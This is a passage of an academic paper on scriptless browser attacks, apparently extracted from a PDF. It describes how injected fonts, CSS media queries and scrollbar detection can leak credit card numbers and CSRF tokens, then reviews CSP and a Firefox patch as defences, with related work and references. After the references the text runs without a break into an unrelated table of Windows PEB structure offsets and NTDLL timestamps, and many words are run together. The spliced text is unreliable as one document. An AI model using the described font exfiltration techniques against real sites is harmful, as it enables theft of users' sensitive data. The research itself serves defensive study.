Iframe to determine when the visible content-size is being
undercut and causes the scrollbar to appear. At this mo-
ment, theoverallview-sizewilldecreaseaswell andcausea p-
pearance of a side channel by having the CSS Media Query
initiate a HTTP request via (for example) background im-
ages. Note that this time we do not need to utilize timing
attacks: ThemediaqueryCSSprovidesdetailed information
on the pixel width that the scrollbars appeared at. Combin-
ing that information with the known distinct width of the
contextual ligature replacing the credit card number creat es
a verbose and precise side channel attack.
3.4 Building Dictionary Fonts using Contex-
tual Alternatives
To accelerate the process of identifying and determining
particular strings and sub-strings on an injected website, an
attacker might need a large number of different fonts and
requests. The aforementioned attack samples are described
as capable of exfiltrating single characters from an injecte d
website. To be more efficient, the adversary can employ the
Discretionary Ligatures orContextual Alternatives provided
by SVG and WOFF fonts [14]. By injecting a cross-domain
font containing a dictionary of several hundreds of thou-
sands of string combinations, one can greatly accelerate th e
detection process.
Note that the character information for each string rep-
resentation can be small in size: Fonts use vector graph-
ics and all that is necessary to deliver the detection featur e
of a distinct width can be contained by a path compris-
ing of two single points. Within a single font file of one
megabyte in size, an attacker can store vast amounts of
contextual alternatives that depend on the nature of the
represented string. As for data leakage of numerical val-
ues (for instance for being able to leak credit card num-
bers or similar information), the attack font can be even
smaller in size and still easily discover and represent the
single blocks a credit card number consists of. The tools
necessary to create attack fonts are freely available for le -
gitimate use; for creating SVG fonts containing dictionari es
a simple text editor suffices. Compressing the font to the
SVGZ (compressed SVG) format to be optimized in size re-
quires a simple gzipimplementation. For editing and abus-
ing WOFF fonts, the free and open textttFontForge tool
available at http://fontforge.sourceforge.net/ can be
easily well-used.
The results of our research signify that font-injections
might actively contribute to the future attack landscape.
While CSP and NoScript protect against cross-domain font
injections by default, we need to monitor public font APIs
use. That is because they can be abused and deliver attack
fonts, bypass white-list-based filters and protection tool s.
By doing so, they will be breaking the trust users put into
providers such as Google Web Fonts andTypeKit, both of
which are free web-font deployment services.
4. MITIGATIONTECHNIQUES
In this section, we analyze existing attack mitigation tech -
niques to determine to what extent website owners and de-
velopers can protect against scriptless attacks. Acknowle dg-
ing the wide range of possibilities for scriptless attacks ( this
publication only discusses two of potentially many more at-
tacks’ variations), we conclude that several layers of pro-
tection are necessary to effectively and holistically defen d
against CSS-, SVG- and HTML-based data leakage.
4.1 Content Security Policy(CSP)
CSP was originally developed by Mozilla and it is now
specified as a draft by the W3C Web Application Security
working group. The primary goal of CSP is to mitigate
content injection vulnerabilities like cross-site script ing by
determining at least one domain as a valid source for script-
ing code. To achieve this goal, one can use a directive like
frame-src orsandbox. Toprovideanexample, inthecase of
frame-src it is possible to let a supporting user agent check
which frames can be embedded in a website. It is therefore
possible to gain a fine granularity about the allowed content
on a controllable website. Thus, CSP is capable of reduc-
ing the potential harmful effects of malicious code injectio n
attacks. Note that CSP considers both arbitrary styles, in-
line CSS, and web fonts as possibly harmful and therefore
provides matching rules.
In the context of our scriptless attacks, it would be desir-
able to restrict fundamental prerequisites to prevent a Web
page (or rather the user) from being attacked. Therefore,
we analyzed the given CSP directives with respect to the at-
tacks we introduced in this paper. First, we have found that
nearly all directives of the W3C draft, except for the direc-
tivereport-uri forreportingpolicyviolations, arehelpfulin
preventinga website and its users from being affected by ad-
versaries. The directive default-src enforces theuser agent
to execute – with one exception – the remaining directives
of the draft with the given default source of the directive
value. Before going into detail regarding the default-src
influenced directives, it is important to know that pure in-
jections with script or style sheet code intoa vulnerable We b
page cannot be detected by CSP. Thus, it is only possibleto block the content of a file that is loaded from an external
resource.
This leads tothe ability of blockingmalicious contentthat
is included within an external file. A look at our attacks
shows that it makes sense to use at least style-src and
img-src of CSP to further reduce the attack surface. By
specifying the style of the protected Web page with style-
src, it is possible to restrict the access to undesirable CSS
files. Therefore, CSS-based animations for reading DOM
nodes or a usage of the CSS content property will no longer
work in this case as an attacking tool. The same applies to
img-src; as mentionedbefore, SVGfilescanbeusedtocarry
out scriptless attacks and intercept events, keystrokes an d
similar user interaction without using scripting technolo gies.
In consequence, blocking SVG files from another site and
especially another domain is recommended for achieving a
better level of security. Based on our example attacks, we
also propose to use frame-src to restrict the resources of
embedded frames as well as font-src for limiting external
font sources.
Once the possibility of increasing the security by restrict -
ing external file resources has been made clear, we are left
with a following consideration: can one restrict possible at-
tack vectors inside the protected site? This is exactly the
case when we use sandbox as a directive which is not con-
trolled or set by default-src . It restricts the available con-
tent based on the HTML5 sandbox attribute values. This
directive can therefore be used to for example deactivate th e
executionofscripts; hence, JavaScript-basedattackswil l not
function. Whatwas notconsideredtobedangerous isscript-
less code. In our case, sandbox is just helpful if one is facing
a typical scripting attack.
In summary, we conclude that CSP is a small and helpful
step in the right direction. It specifically assists elimina -
tion of the available side channels along with some of the
attack vectors. In our attack model described in Section 1,
CSP therefore contributes to mitigating precondition 1 and
eliminating precondition 3. Nevertheless, it is insufficien t
to fully cover a wide array of scriptless attacks. What we
recommend is to increase the range of CSP settings, so that
one at least has an option to forbid the execution of style
sheets or – even better – selected style sheet properties. On e
thing will still remain out of CSP’s coverage: a behavior re-
lated to double-clickjacking [21]. The scrollbar detectio n we
have discussed in Section 3.3 relies on a pop-up window in
case the attacked website uses a frame-buster. Contrary to
available frame detection and busting features, no reliabl e
way to achieve the same security for pop-up windows and
detached views is present in modern browsers. In Section
4.2 we therefore propose additional protection mechanisms
against scriptless attacks and similar threats.
4.2 Detecting Detached Views
Several of the attacks we described in Section 3 can be
leveraged by using Iframes and similar content framing tech -
niques. Nevertheless, a website can easily deploy defen-
sive measurements bysimply usingproper X-Frame-Options
headers. Attackers, aware of that defense technique, have
since started utilizing a different way and leverage pop-up
windows and detached views to accomplish data leakage ex-
ploits and even clickjacking attacks without being affected
byframe-busting code [40] and X-Frame-Options headers.
Some of these attacks have been documented under the la-
beldouble-clickjacking , while other techniques involve drag
& drop operations of active content such as applets, or copy
& paste operations into editable content areas across do-
mains. Duetotheextendedattacksurface, we want tostress
that as far as modern browsers are concerned, there is no
feasible way for a website to determine if it is being loaded
in a detached view respective pop-up window or not.
Inordertofixthisproblem, wecreatedapatchfor arecent
versionoftheWebbrowser Firefox ( Nightly 14.0a1 , available
as ofApril2012), providingapossible solutiontopreventt he
described attacks. The patch extends the well-known DOM
windowobject by two additional properties: isPopup and
loadedCrossDomain . Both properties are represented by a
boolean value and can be accessed in a read-only manner by
any website at any time. As the naming already suggests,
window.isPopup is true only if the actual GUI window rep-
resented by the current DOM windowobject is a detached
view. Likewise, window.loadedCrossDomain is true only if
the current DOM windowobject was loaded cross-domain.
These features enable websites to check their own status
with the use of simple JavaScript code.
Subsequently,incase of unsafecircumstances, appropriat e
countermeasures can be taken. For instance, a website could
protect itself against the attacks described in Section 3 by
restricting itself from being loaded inside a detached view
in a cross-domain manner or inside an Iframe. While the
latter can already be accomplished in modern browsers out
of the box (by setting the X-Frame-Options header to ei-
therSAMEORIGIN orDENY), the former cannot. Luckily, it
becomes easily possible with our custom extension of the
Firefox browser, as we have demonstrated in Listing 3 be-
low.
if(window.isPopup &&
window.loadedCrossDomain) {
// stop loading
window.close();
}
// continue loading
Listing 3: JavaScript usage example for the two
additional properties exposed by the modified
Firefox version
The patch consists of changes in the C ++classesnsGlobal-
Window andnsWindowWatcher as well as in the interfaces
nsIDOMWindow andnsIWebBrowserChrome of the Firefox
code base. While the isPopup property could directly be
implemented by examining a certain already existing inter-
nal window-flag, the introductionof the loadedCrossDomain
property required additional code. Whenever a website trie s
to open a new window, this code compares the host name
of the URI of the invoking website to the host name of the
website-to-be-loaded (including ports). If the host-name s
differ, a newly introduced internal flag is set to indicate thi s
condition, and vice versa, this flag is unset in the opposite
situation. Thus the loadedCrossDomain property is also up-
dated correctly in case that an already existing popup win-
dowisreusedbytheFirefoxbrowsertodisplayanewwebsite
in a popup-mode.
Allowing awebsite todetermine whetherit is beingloaded
in a detached view, one can mitigate several attack tech-
niques at once. This includes several of the aforementioned
scriptless attacks, double-clickjacking, drag & drop as we ll
as several copy & paste attacks. We plan to discuss thispatch with different browser development teams and evalu-
ate how this technique can be adopted by several browsers
to protect users against attacks.
4.3 Miscellanneous Defense Techniques
Scriptless attacks can occur in aplethora of variations and
are often based on a malicious concatenation of otherwise
benign features. We so far elaborated on ways to harden
the browser and provide new levers for website owners to
strengthen their applications with minimal effort. Further -
more, we shed light on how CSP helps preventing scriptless
attacks by defining strict origin policies for images, fonts ,
CSSandotherresourcespotentiallycausinginformationle ak-
age by requesting data from across origins.
Zalewski et al. discussed yet another aspect of scriptless
attacks in 2011, pointing at dangling open tags and, more
specifically, elements such as button, textarea and half-op en
imagesrcattributes to be used for data leakage [52]. These
attacks are simple yeteffectiveand requireaweb applicatio n
and eventual HTML filtering techniques to apply grammar
validation and enforce syntactical validity of user genera ted
(X)HTML content. An open textarea can easily turn the
rest of a website into its very own content and thereby leak
sensitive dataandCSRFtokens. Notethatevenimage maps
and similar deprecated technologies can be used for script-
less data leakage by sending click-coordinates to arbitrar y
sinks across domains. Aside from the aforementioned pro-
tection techniques and mechanisms, classic HTML content
and grammar validation is of equal importance for, as Za-
lewski coined it, protection from attacks in the “post-XSS
world” [52]. Note that this is an attacker model similar to
the one we have examined in this paper. Eliminating the
side channel rather than the attack vector is again of greate r
importance for solving this specific problem.
5. RELATED WORK
Members of the security community have granted a lot of
attention to the attacks against web applications. We will
now review related work in this area and discuss the novel
aspects and contributions of scriptless attacks.
HistorySniffing.
From a conceptual point of view, CSS-based browser his-
tory sniffing is closely related to our work. This technique
enables an adversary to determine which websites have been
visited by the user in the past. History sniffing is docu-
mentedinseveral browserbugreportsformanyyearsnow[2,
9,39]. This method has been used in different attack sce-
narios [22,24,32,47,50]. In an empirical study, Jang et al.
found that several popular sites actually use this techniqu e
to exfiltrate information about their visitors’ browsing be -
havior [25]. Given the prevalence of this attack vector, the
latest versions of common web browsers have implemented
certain defenses protecting users from CSS-based history
sniffing.
We also use CSS as part of our attacks, yet we refrain
from using the actual concept behind history sniffing. More
specifically, we demonstrate how CSS-based animations, the
CSScontent property,andCSSMediaQueriescanbeabused
by an adversary to access and gather specific information.
As a result, our attacks also work against the latest version s
of popular web browsers. One must be aware that while
many documented history sniffing attacks are significantly
faster when using JavaScript toexfiltrate data, these attac ks
can also be implemented solely based on CSS and no active
scripting code, which in turndistinguishes them as scriptl ess
attacks according to our definition.
Timing Attacks.
A more general form of history sniffing attacks in the con-
text of web security was presented by Felten and Schneider
who analyzed timing difference related to whether or not
a resource is cached [15]. In a similar attack, Bortz and
Boneh [7] showed how timing attacks can be implemented
to recover private information from web applications. Re-
cently, Chen et al. demonstrated different side channel leak s
related to popular web sites and also based on timing infor-
mation [12]. In other domains, timing attacks are a well-
establishedtechniqueandwereusedtoexfiltrateinformati on
from many different kinds of systems (e.g., OpenSSL [10],
SSH [42], or virtual machine environment [38]).
Whiletimingmeasurementsare usedas partoftheattacks
we covered in this paper, we take advantage of other kinds
of timing attacks and use this general concept to determine
specific information in the context of a web browser.
Client-andServer-SideXSSDetectionorPrevention.
Due to their high practical prevalence, XSS attacks have
been covered by a dedicated large body of research. We
will now briefly discuss different client- and server-side ap -
proaches to discovering and preventing such attacks. Note
that their effectiveness is limited in the context of scriptl ess
attacks due to their differing ground principles.
Bates et al. [4] investigate client-side filtering approach es
capable of preventingXSS. They have found flaws in noXSS,
NoScript and the IE8 XSS filter, and showed that some
attack vectors were only activated afterXSS filtering. In
contrast to other approaches, they are inclined to put XS-
SAUDITOR between the HTML parser and the JavaScript
engine. This design will however not prevent scriptless at-
tacks as they do not target the JavaScript engine.
Curtsinger et al. [13] put forward a browser extension
called ZOZZLE to categorize malicious JavaScript code with
Bayesian classification. It remains an open question if such
learning-based defense mechanisms will work against scrip t-
less attacks.
Pietraszek et al., introduced context-sensitive string eval-
uation(CSSE), a library to examine strings of incoming
user-generated data by relying on a set of meta-data [37].
Depending on the context derived from the attached meta-
data, different filtering and escaping methods were being
applied for the protection of the existing applications. Th is
low-level approach is described as operational for existin g
applications, requiring few to no application developer im -
plementation effort.
Kirda et al. proposed a client-side XSS prevention tool
calledNoxes[30]. By keeping the browser from contacting
URLs that do not belong to the domain of the web applica-
tion, this tool prevents an adversary from leaking sensitiv e
data to his server. From a conceptual point of view, such an
approach can also be used to limit what an adversary can
achieve with scriptless attacks, since it prevents side cha n-
nels from exfiltrating stolen information. Furthermore, th e
authors elaborate on the difficulties of server-side XSS de-
tection and prevention based on the manifold of encoding
and obfuscation techniques an attacker can choose from. Ina similar way, we argue that scriptless attacks cannot be
prevented at the server-side.
Jim et al. introduced Browser-Enforced Embedded Poli-
cies(BEEP) [26], a policy-driven browser extension capable
of controlling whether a certain script may execute or not.
More specifically, BEEP enables a user to whitelist legiti-
mate scripts and disable scripts for certain regions of the
web page. The whole concept represents another foundation
for CSP [43]. Nadji et al. proposed a similar approach: doc-
ument structure integrity (DSI) [35] ensures that dynamic
content is separated from static content on the server-side ,
while both are combined at the client-side in an integrity-
preserving way. Blueprint by Louw and Venkatakrishnan
follows a similar approach [31]: a server-side application en-
codes the content into a model representation that can be
processed by the client-side part of the tool. Saxena et al.
presented ScriptGuard , a context-sensitive XSS sanitation
tool capable of automatic context detection and accordant
sanitation routine selection [41]. Note that all these ap-
proaches focus on preventing code scripting, which implies
thatscriptless attackscanpotentiallybypasssuchprotec tion
mechanisms, for we do not use dynamic content.
Heiderich et al. published on XSS vulnerabilities caused
by SVG graphics bypassing modern HTML sanitizers [20]
as well as DOM-based attacks detection in the context of
browser malware and complex cross-context scripting at-
tacks [19].
Martin and Lam [34] as well as Kieyzun et al. [29] intro-
duced tools capable of automatically generating XSS and
SQL injection attacks against web applications. XSSDS [28]
is a system that determines if an attack is actually success-
ful by comparing HTTP requests and responses. In recent
papers, different approaches to discovering parameter inje c-
tion [1] and parameter tampering vulnerabilities [5] were
offered. These types of tools are not yet available for auto-
mated discovery and creation of scriptless attacks, althou gh
we expect that similar notions can be identified and ap-
plied to appropriately consistent tools’ development in th e
future.
6. CONCLUSION ANDOUTLOOK
In this paper, we introduced a class of attacks against web
applications we call scriptless attacks . The key property of
these attacks is that they do not rely on the execution of
JavaScript (or any other language) code. Instead, they are
solely based on standard browser features available in mod-
ern user agents and defined in the current HTML and CSS3
specificationdrafts. Inaway, thiskindofattackscanbesee n
as a generalization of CSS-based history stealing [22,32] a nd
similar attackvectors[52]. Wediscussedseveral browser f ea-
tures useful for scriptless attacks, covering a variety of w ays
in which an adversary can access information or establish a
side channel. Furthermore, we presented several scriptles s
attacks against an exemplary web application and demon-
strated how an adversary can successfully obtain sensitive
information such as CSRF token or user-input by abusing
legitimate browser concepts. In addition, we showed that an
adversary can also exfiltrate specific information and estab -
lish side channels that make this attack feasible.
While the attacks discussed in this paper presumably do
not represent the entirety of ways to illegitimately retrie ve
sensitive user-data, we believe that the attack components
discussed by us are of great importance to other attack vec-
tors. Therefore, a detailed analysis and further elaborate d
investigation pertaining to possible defense mechanisms w ill
likely yield more attack vectors. We hope that this paper
spurs research on attacks against web applications that are
not based on the execution of JavaScript code.
As another contribution, we introduced a browser patch
that enables a website to determine if it is being loaded in
a detached view or pop-up window, showcasing mitigation
technique for several kinds of attacks. Within our future
work, we will examine more ways for dealing with and pre-
venting scriptless attacks.
Acknowledgments
This work has been supported by the German Federal Min-
istry of Education and Research (BMBF grant 01BY1205A
JSAgents).
7. REFERENCES
[1] M. Balduzzi, C. Gimenez, D. Balzarotti, and E. Kirda.
Automated Discovery of Parameter Pollution
Vulnerabilities in Web Applications. In Network and
Distributed System Security Symposium (NDSS) , 2011.
[2] D. Baron. :visited support allows queries into global
history.https://bugzilla.mozilla.org/147777 ,
2002.
[3] A. Barth, C. Jackson, and J. C. Mitchell. Robust
Defenses for Cross-Site Request Forgery. In ACM
Conference on Computer and Communications
Security (CCS) , 2008.
[4] D. Bates, A. Barth, and C. Jackson. Regular
expressions considered harmful in client-side xss filters.
InProceedings of the 19th international conference on
World wide web , pages 91–100. ACM, 2010.
[5] P. Bisht, T. Hinrichs, N. Skrupsky, R. Bobrowicz, and
V. Venkatakrishnan. NoTamper: Automatic Blackbox
De- tection of Parameter Tampering Opportunities in
Web Applications. In ACM Conference on Computer
and Communications Security (CCS) , 2010.
[6] P. Bisht and V. Venkatakrishnan. XSS-GUARD:
Precise Dynamic Prevention of Cross-Site Scripting
Attacks. In Detection of Intrusions and Malware, and
Vulnerability Assessment (DIMVA) . Springer, 2008.
[7] A. Bortz and D. Boneh. Exposing Private Information
by Timing Web Applications. In 16th International
Conference on World Wide Web (WWW) , 2007.
[8] B. Bos, T.  ̧ Celik, I. Hickson, and H. Wium Lie.
Generated content, automatic numbering, and lists.
http://www.w3.org/TR/CSS21/generate.html , June
2011.
[9] Z. Braniecki. CSS allows to check history via :visited.
https://bugzilla.mozilla.org/224954 , 2003.
[10] D. Brumley and D. Boneh. Remote Timing Attacks
are Practical. In USENIX Security Symposium , 2003.
[11] CERT Coordination Center. Advisory CA-2000-02
Malicious HTML Tags Embedded in Client Web
Requests.
http://www.cert.org/advisories/CA-2000-02.html ,
2000.
[12] S. Chen, R. Wang, X. Wang, and K. Zhang.
Side-Channel Leaks in Web Applications: A Reality
Today, a Challenge Tomorrow. In IEEE Symposium
on Security and Privacy , 2010.[13] C. Curtsinger, B. Livshits, B. Zorn, and C. Seifert.
Zozzle: Fast and precise in-browser javascript malware
detection. In USENIX Security Symposium , 2011.
[14] J. Daggett. CSS fonts module level 3.
http://www.w3.org/TR/css3-fonts/ , Oct. 2011.
[15] E. W. Felten and M. A. Schneider. Timing Attacks on
Web Privacy. In ACM Conference on Computer and
Communications Security (CCS) , 2000.
[16] M. Heiderich. Content exfiltration using scrollbar
detection and media queries.
http://html5sec.org/scrollbar/test , June 2012.
[17] M. Heiderich. Measurement-based content exfiltration
using smart scrollbars.
http://html5sec.org/webkit/test , June 2012.
[18] M. Heiderich. Scriptless SVG Keylogger.
http://html5sec.org/keylogger , June 2012.
[19] M. Heiderich, T. Frosch, and T. Holz. IceShield:
Detection and Mitigation of Malicious Websites with a
Frozen DOM. In Recent Advances in Intrusion
Detection (RAID) , 2011.
[20] M. Heiderich, T. Frosch, M. Jensen, and T. Holz.
Crouching Tiger – Hidden Payload: Security Risks of
Scalable Vectors Graphics. In ACM Conference on
Computer and Communications Security (CCS) , 2011.
[21] D. Huang and C. Jackson. Clickjacking Attacks
Unresolved.
https://docs.google.com/document/\\pub?id=
1hVcxPeCidZrM5acFH9ZoTYzg1D0VjkG3BDW_oUdn5qc ,
June 2011.
[22] C. Jackson, A. Bortz, D. Boneh, and J. C. Mitchell.
Protecting Browser State From Web Privacy Attacks.
In15th International Conference on World Wide Web
(WWW) , 2006.
[23] D. Jackson, D. Hyatt, C. Marrin, S. Galineau, and
L. D. Baron. CSS animations.
http://dev.w3.org/csswg/css3-animations/ , Mar.
2012.
[24] A. Janc and L. Olejnik. Web Browser History
Detection as a Real-World Privacy Threat. In
European Symposium on Research in Computer
Security (ESORICS) , 2010.
[25] D. Jang, R. Jhala, S. Lerner, and H. Shacham. An
Empirical Study of Privacy-violating Information
Flows in JavaScript Web Applications. In ACM
Conference on Computer and Communications
Security (CCS) , 2010.
[26] T. Jim, N. Swamy, and M. Hicks. Defeating Script
Injection Attacks with Browser-enforced Embedded
Policies. In 16th International Conference on World
Wide Web (WWW) . ACM, 2007.
[27] M. Johns. Code Injection Vulnerabilities in Web
Applications – Exemplified at Cross-Site Scripting .
PhD thesis, University of Passau, Passau, July 2009.
[28] M. Johns, B. Engelmann, and J. Posegga. XSSDS:
Server-side Detection of Cross-site Scripting Attacks.
InAnnual Computer Security Applications Conference
(ACSAC) , 2008.
[29] A. Kieyzun, P. Guo, K. Jayaraman, and M. Ernst.
Automatic Creation of SQL Injection and Cross-site
Scripting Attacks. In 31st International Conference on
Software Engineering . IEEE Computer Society, 2009.
[30] E. Kirda, C. Kruegel, G. Vigna, and N. Jovanovic.
Noxes: A Client-side Solution for Mitigating Cross-site
Scripting Attacks. In ACM Symposium on Applied
Computing (SAC) , 2006.
[31] M. Louw and V. Venkatakrishnan. Blueprint: Robust
prevention of cross-site scripting attacks for existing
browsers. In IEEE Symposium on Security and
Privacy, 2009.
[32] M. Jakobsson and S. Stamm. Invasive Browser Sniffing
and Countermeasures. In 15th International
Conference on World Wide Web (WWW) , 2006.
[33] G. Maone. NoScript :: Firefox add-ons. https:
//addons.mozilla.org/de/firefox/addon/722/ , July
2010.
[34] M. Martin and M. Lam. Automatic Generation of XSS
and SQL Injection Attacks With Goal-directed Model
Checking. In USENIX Security Symposium , 2008.
[35] Y. Nadji, P. Saxena, and D. Song. Document
Structure Integrity: A Robust Basis for Cross-site
Scripting Defense. In Network and Distributed System
Security Symposium (NDSS) , 2009.
[36] OWASP. Top Ten Project.
https://www.owasp.org/index.php/Category:
OWASP\_Top\_Ten\_Project , Jan. 2012.
[37] T. Pietraszek and C. Berghe. Defending Against
Injection Attacks Through Context-sensitive String
Evaluation. In Recent Advances in Intrusion Detection
(RAID), 2006.
[38] T. Ristenpart, E. Tromer, H. Shacham, and S. Savage.
Hey, you, get off of my cloud: exploring information
leakage in third-party compute clouds. In ACM
Conference on Computer and Communications
Security (CCS) , 2009.
[39] J. Ruderman. CSS on a:visited can load an image
and/or reveal if visitor been to a site.
https://bugzilla.mozilla.org/57351 , 2000.
[40] G. Rydstedt, E. Bursztein, D. Boneh, and C. Jackson.
Busting Frame Busting: a Study of Clickjacking
Vulnerabilities on Popular Sites. In Web 2.0 Security
and Privacy (W2SP) Workshop , July 2010.
[41] P. Saxena, D. Molnar, and B. Livshits. Scriptgard:
Preventing script injection attacks in legacy web
applications with automatic sanitization. Technical
report, Technical Report MSR-TR-2010-128,
Microsoft Research, 2010.
[42] D. X. Song, D. Wagner, and X. Tian. Timing Analysis
of Keystrokes and Timing Attacks on SSH. In
USENIX Security Symposium , 2001.
[43] S. Stamm, B. Sterne, and G. Markham. Reining in the
Web with Content Security Policy. In 19th
International Conference on World Wide Web
(WWW) , 2010.
[44] M. Van Gundy and H. Chen. Noncespaces: Using
Randomization to Enforce Information Flow Tracking
and Thwart Cross-site Scripting Attacks. In Network
and Distributed System Security Symposium (NDSS) ,
2009.
[45] E. Vela. CSS Attribute Reader Proof Of Concept.
http://eaea.sirdarckcat.net/cssar/v2/ , Nov.
2009.[46] P. Vogt, F. Nentwich, N. Jovanovic, E. Kirda,
C. Kruegel, and G. Vigna. Cross site scripting
prevention with dynamic data tainting and static
analysis. In Network and Distributed System Security
Symposium (NDSS) , 2007.
[47] Z. Weinberg, E. Y. Chen, P. R. Jayaraman, and
C. Jackson. I Still Know What You Visited Last
Summer: Leaking Browsing History via User
Interaction and Side Channel Attacks. In IEEE
Symposium on Security and Privacy , 2011.
[48] J. Weinberger, P. Saxena, D. Akhawe, M. Finifter,
R. Shin, and D. Song. A Systematic Analysis of XSS
Sanitization in Web Application Frameworks. In
European Symposium on Research in Computer
Security (ESORICS) , 2011.
[49] H. Wium Lie, T.  ̧ Celik, D. Glazman, and A. van
Kesteren. Media queries.
http://www.w3.org/TR/css3-mediaqueries/ , July
2010.
[50] G. Wondracek, T. Holz, E. Kirda, and C. Kruegel. A
Practical Attack to De-anonymize Social Network
Users. In IEEE Symposium on Security and Privacy ,
2010.
[51] P. Wurzinger, C. Platzer, C. Ludl, E. Kirda, and
C. Kruegel. SWAP: Mitigating XSS Attacks Using a
Reverse Proxy. In ICSE Workshop on Software
Engineering for Secure Systems . IEEE Computer
Society, 2009.
[52] M. Zalewski. Postcards from the post-XSS world.
http://lcamtuf.coredump.cx/postxss/ , 2011.PEB Evolution
NTDLL
TimeStamp3B7D7EBB
3B7DE01E
3D6DD030
3D6DE29B41107F17
411089B7
48025C72
4802B3E6
498C70363E8004ED
3E800DDD42435C02
42435C4D
42435E08
424360CC
45D69A63
45D6A034
45D70A62
45D70BAD4549AB99
4549AB99
4549ACCF
4549ACD4
4549B0A8
4549B41447918547
47918548
47918A5E
47918A66
47918DFE
4791909A
49E018CF
49E018CF
49E018FF
49E01904
49E02292
49E025034943158F
494316C4
49431951
49431F6B49EE8A5F
49EE8E6C
49EE9768
49EE9FA1
4A5BBF34
4A5BC19D
4A5BC487
4A5BCCA6
4BA9775A
4BA9796A
4CC78DE7
4CE77482
4CE78918
4CE7891C
4CE78F28
4CE79326
4EC47C8E
4EC484644E546498
4E5464A2
4E54669B4F3F1DFC
4F3F1DFC
4F3F2277
4F3F2BEC
4F3F36C6
4F3F373D4FB70542
4FB70543
4FB70C03
4FB7166D
4FB71A7F
4FB71ABD
50109933
50109933
50109E76
5010ACD2
5010AE7A
5010AEB6
OS Version XP, XP SP1 XP SP2, XP SP3 2003 2003 SP1, 2003 SP2 VistaVista SP1, Vista  
SP2Win7 BetaWin7 RC, Win7 
RTMWin8 Dev 
Prev x64 
(8102)Win8 Beta Win8 RC, Win8 RTM
x86 offset
offset:bit(len)Field Namex64 offset
offset:bit(len)
0x0000 unsigned char, InheritedAddressSpace 0x0000
0x0001 unsigned char, ReadImageFileExecOptions 0x0001
0x0002 unsigned char, BeingDebugged 0x0002
0x0003
unsigned char, SpareBoolunsigned char, BitField 0x0003
0x0003:0x00(1) unsigned char, ImageUsesLargePages 0x0003:0x00(1)
0x0003:0x01(1)
unsigned char, SpareBitsunsigned char, IsProtectedProcess 0x0003:0x01(1)
0x0003:0x02(1) unsigned char, IsLegacyProcess 0x0003:0x02(1)
0x0003:0x03(1) unsigned char, IsImageDynamicallyRelocated 0x0003:0x03(1)
0x0003:0x04(1)
unsigned char, 
SpareBitsunsigned char, SkipPatchingUser32Forwarders 0x0003:0x04(1)
0x0003:0x05(1)
unsigned char, SpareBitsunsigned char, IsPackagedProcess 0x0003:0x05(1)
0x0003:0x06(1) unsigned char, 
SpareBitsunsigned char, IsAppContainer 0x0003:0x06(1)
0x0003:0x07(1) unsigned char, SpareBits 0x0003:0x07(1)
0x0004 void *, Mutant 0x0008
0x0008 void *, ImageBaseAddress 0x0010
0x000C struct _PEB_LDR_DATA *, Ldr 0x0018
0x0010 struct _RTL_USER_PROCESS_PARAMETERS *, ProcessParameters 0x0020
0x0014 void *, SubSystemData 0x0028
0x0018 void *, ProcessHeap 0x0030
0x001C struct _RTL_CRITICAL_SECTION *, FastPebLock 0x0038
0x0020 void *, FastPebLockRoutine void *, SparePtr1 void *, AtlThunkSListPtr 0x0040
0x0024 void *, FastPebUnlockRoutine void *, SparePtr2 void *, IFEOKey 0x0048
0x0028
unsigned long, EnvironmentUpdateCountunsigned long, CrossProcessFlags 0x0050
0x0028:0x00(1) unsigned long, ProcessInJob 0x0050:0x00(1)
0x0028:0x01(1) unsigned long, ProcessInitializing 0x0050:0x01(1)
0x0028:0x02(1)
unsigned long, 
ReservedBits0unsigned long, ProcessUsingVEH 0x0050:0x02(1)
0x0028:0x03(1) unsigned long, ProcessUsingVCH 0x0050:0x03(1)
0x0028:0x04(1C) unsigned long, 
ReservedBits0unsigned long, ProcessUsingFTH 0x0050:0x04(1C)
0x0028:0x05(1B) unsigned long, ReservedBits0 0x0050:0x05(1B)
0x002C void *, KernelCallbackTable void *, KernelCallbackTable / void *, UserSharedInfoPtr 0x0058
0x0030 unsigned long[0x1], SystemReserved 0x0060
0x0034
unsigned long, 
ExecuteOptions unsigned long, 
AtlThunkSListPtr32unsigned long, 
ExecuteOptionsunsigned long, SpareUlongunsigned long, 
TracingFlags
unsigned long, AtlThunkSListPtr320x0064
0x0034:0x00(1)unsigned long, 
HeapTracingEnabled0x0064:0x00(1)
0x0034:0x00(1)unsigned long, 
CritSecTracingEnabled0x0064:0x00(1)
0x0034:0x02(1E)unsigned long, 
SpareBitsunsigned long, 
SpareBitsunsigned long, 
SpareTracingBits0x0064:0x02(1E)
0x0038 struct _PEB_FREE_BLOCK *, FreeListunsigned long (x64:  
unsigned __int64),  
SparePebPtr0void *, ApiSetMap 0x0068
0x003C unsigned long, TlsExpansionCounter 0x0070
0x0040 void *, TlsBitmap 0x0078
0x0044 unsigned long[0x2], TlsBitmapBits 0x0080
0x004C void *, ReadOnlySharedMemoryBase 0x0088
0x0050 void *, ReadOnlySharedMemoryHeap void *, HotpatchInformation 0x0090
0x0054 void * *, ReadOnlyStaticServerData 0x0098
0x0058 void *, AnsiCodePageData 0x00A0
0x005C void *, OemCodePageData 0x00A8
0x0060 void *, UnicodeCaseTableData 0x00B0
0x0064 unsigned long, NumberOfProcessors 0x00B8
0x0068 unsigned long, NtGlobalFlag 0x00BC
0x0070 union _LARGE_INTEGER, CriticalSectionTimeout 0x00C0
0x0078 unsigned long (x64: unsigned __int64), HeapSegmentReserve 0x00C8
0x007C unsigned long (x64: unsigned __int64), HeapSegmentCommit 0x00D0
0x0080 unsigned long (x64: unsigned __int64), HeapDeCommitTotalFreeThreshold 0x00D8
0x0084 unsigned long (x64: unsigned __int64), HeapDeCommitFreeBlockThreshold 0x00E0
0x0088 unsigned long, NumberOfHeaps 0x00E8
0x008C unsigned long, MaximumNumberOfHeaps 0x00EC
0x0090 void * *, ProcessHeaps 0x00F0
0x0094 void *, GdiSharedHandleTable 0x00F8
0x0098 void *, ProcessStarterHelper 0x0100
0x009C unsigned long, GdiDCAttributeList 0x0108
0x00A0 void *, LoaderLock struct _RTL_CRITICAL_SECTION *, LoaderLock 0x0110
0x00A4 unsigned long, OSMajorVersion 0x0118
0x00A8 unsigned long, OSMinorVersion 0x011C
0x00AC unsigned short, OSBuildNumber 0x0120
0x00AE unsigned short, OSCSDVersion 0x0122
0x00B0 unsigned long, OSPlatformId 0x0124
0x00B4 unsigned long, ImageSubsystem 0x0128
0x00B8 unsigned long, ImageSubsystemMajorVersion 0x012C
0x00BC unsigned long, ImageSubsystemMinorVersion 0x0130
